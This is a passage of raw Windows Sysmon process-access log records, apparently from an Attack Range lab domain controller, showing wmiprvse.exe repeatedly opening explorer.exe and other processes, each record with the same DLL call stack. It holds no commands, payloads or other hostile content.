dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246947Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.588{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246946Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.588{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246945Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.588{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246944Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.588{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246943Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.588{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246942Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.588{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246941Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.588{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246940Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.588{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246939Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.588{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246938Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.587{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246937Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.587{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246936Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.586{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246935Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.586{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246934Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.585{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246933Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.584{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246932Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.584{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246931Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.583{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246930Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.582{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246929Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.581{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246928Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.581{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 